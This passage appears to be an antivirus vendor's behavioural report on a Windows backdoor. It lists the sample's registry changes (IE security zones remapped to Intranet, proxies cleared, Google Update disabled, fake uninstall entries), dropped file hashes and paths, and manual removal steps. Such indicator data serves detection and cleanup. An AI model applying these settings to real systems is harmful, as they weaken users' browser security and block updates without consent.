[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:188 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"InstallDate" = "20150509"
[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"DisplayIcon" = "%System%\msiexec.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"CategoryName" = "Apps"
[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"UninstallString" = "%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.exe /s /n /i:ExecuteCommands;UninstallCommands"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"DisplayName" = "BrrOwsiNGclEarly"
"ProductName" = "BrrOwsiNGclEarly"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6" = "1"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 F2 FF CC 16 67 EB 1A 69 B1 07 24 17 C6 05 E8"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6AU" = "1"
"DoNotAllowIE6" = "1"
[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"NoModify" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"SilentUninstall" = "%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.exe /s /n /i:ExecuteCommands;UninstallCommands"
"NoRepair" = "1"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"
[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Backdoor deletes the following registry key(s):
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1016 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"ProductName" = "Chime"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"NoModify" = "1"
[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"UninstallString" = "%Program Files%\Chime\Chime.exe /s /n /i:ExecuteCommands;UninstallCommands"
[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"InstallDate" = "20150509"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"CategoryName" = "Apps"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"NoRepair" = "1"
"DisplayIcon" = "%System%\msiexec.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 4B B3 27 69 E7 96 8C 9C 2F D3 6F 20 3D 01 25"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"SilentUninstall" = "%Program Files%\Chime\Chime.exe /s /n /i:ExecuteCommands;UninstallCommands"
[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"DisplayName" = "Chime"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"
[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Backdoor deletes the following registry key(s):
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process rundll32.exe:1432 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"a1dcff5b" = "V/////%%"
"0dc3ee96" = "/P////%%"
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"a2e3b941" = "///%"
"6185d035" = "Vx/2/Cx/V//l////"
"d1abcdb6" = "///%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f0bf0bde" = "///%"
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"c6c5dd44" = "V/////%%"
"587b5709" = "V/////%%"
"7367429f" = "///%"
"27ddcf6f" = "///%"
"48bd1aff" = "V/////%%"
"37b7a6d8" = "UlAr/XJ/c//k////"
"e8f9dcc7" = "UlAr/XJ/c//k////"
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"
"fe94ce1e" = "V/////%%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"
"7f69fa1f" = "///%"
"f2c53c49" = "UlAr/XJ/c//k////"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"370856c7" = ""
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"2e22d94e" = "///%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"3efeb33e" = ""
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"c5705860" = "Vx////%%"
"8b9e4cbc" = "V/////%%"
"c99a5f5c" = "///%"
"3c09c42b" = "///%"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 A6 62 68 D8 F2 D2 66 8E 39 88 BD C0 BD DF 21"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"51d2f2ea" = "PPAf/Xh/alAf/XJ/bxAR/Xt/blAu////"
"0e93c3f3" = "///%"
"65114b36" = "Vl/l////"
"e46c271e" = "///%"
"0c230bcb" = "///%"
"72758a5d" = "///%"
"bbf88800" = "///%"
"a0743acc" = "N/////%%"
"2d71d5ab" = "V/////%%"
"38583bc3" = "Ml/2/CF/M//g/CZ////%"
"f6ad6fa6" = "V/////%%"
"340d3099" = "/P////%%"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"iiid" = "1"
[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"1520c6f1" = "V/////%%"
"414bc593" = "///%"
The process rundll32.exe:1196 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C B3 A7 58 2D 80 17 B5 4A FC 58 61 A2 3F 52 45"
Dropped PE files
MD5 | File path |
---|---|
79f9311ac6a5009fef1a5756a0a529d3 | c:\Program Files\ActiveCoupon\ActiveCoupon.exe |
d6afed6a20c3343acb878ffa399f538b | c:\Program Files\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dll |
9f6c52eec607111136cd222b02bf0530 | c:\Program Files\BrrOwsiNGclEarly\pbk7K2hRvvulDG.exe |
9f6c52eec607111136cd222b02bf0530 | c:\Program Files\Chime\Chime.exe |
4277381dbc9bf652805dad7fc0527793 | c:\Program Files\WWhiteCouPooni\7qwHG4CXj1mdR3.dll |
9f6c52eec607111136cd222b02bf0530 | c:\Program Files\WWhiteCouPooni\7qwHG4CXj1mdR3.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
regsvr32.exe:1932
regsvr32.exe:1980
ArmorerRise.xyz.exe:2036
%original file name%.exe:1176
%original file name%.exe:1988
%original file name%.exe:368
%original file name%.exe:1888
%original file name%.exe:188
%original file name%.exe:1016
rundll32.exe:1432
rundll32.exe:1196 - Delete the original Backdoor file.
- Delete or disinfect the following files created/modified by the Backdoor:
%Documents and Settings%\%current user%\Local Settings\Temp\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}-log.txt (57034 bytes)
%Program Files%\TailCutter\TailCutter.dll (80814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (7972 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3e01bea6\temp.ca.part (71639 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.tlb (13 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\a6316e1ae4dae3cab1ad0965983a8e70.ini (517 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.exe (1504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7C30\images\loader.gif (2 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.dat (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\9Bgp6JPux0JTfR[1].ca (129298 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.dll (6700 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7C30\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\2UzDN7fW9Yl4sH[1].ca (65187 bytes)
%Program Files%\ActiveCoupon\ActiveCoupon.exe (2486 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1818da5e\temp.ca.part (38114 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\2e3398c745d7293bb1ad0965983a8e70.ini (294 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\478\images\progressbar.gif (15 bytes)
%Program Files%\ActiveCoupon\ActiveCoupon.dat (312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\478\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\bg.ca.part (6 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\874a6a15d18c264327f5c81ec98e2cf9.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.mytholiday[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\5[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\3.ini.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(5).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\2.ini.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\6.ini.tmp (592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\%original file name%.exe (16544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(3).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task.ini (6 bytes)
%Documents and Settings%\All Users\Application Data\{c5c5d690-bdd5-c94a-c5c5-5d690bdd5a42}\874a6a15d18c264327f5c81ec98e2cf9.dat (866 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(2).ini (6 bytes)
%Documents and Settings%\All Users\Application Data\{c5c5d690-bdd5-c94a-c5c5-5d690bdd5a42}\%original file name%.exe (16544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\4[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\ArmorerRise.xyz.exe (16584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\3[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\6[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\5.ini.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\4.ini.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(4).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\r1.mytholiday[1] (2 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\d2bec04cb91e9cb6b1ad0965983a8e70.ini (150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f01cb84\temp.ca.part (31648 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\69C0\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Oo8yOHF14wFvBA[1].ca (29424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\098259e7\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\69C0\images\loader.gif (2 bytes)
%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dat (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2C80\images\progressbar.gif (15 bytes)
%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dll (6665 bytes)
%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.exe (1504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2C80\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3f8b64b1\temp.ca.part (43652 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\73515851bcb7cafbb1ad0965983a8e70.ini (522 bytes)
%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.tlb (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\xoL9D9NSNKXd4Z[1].ca (123415 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1980\images\loader.gif (2 bytes)
%Program Files%\Chime\Chime.exe (1504 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\3e3e983e008005d3b1ad0965983a8e70.ini (285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1fb88069\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0e466769\temp.ca.part (16744 bytes)
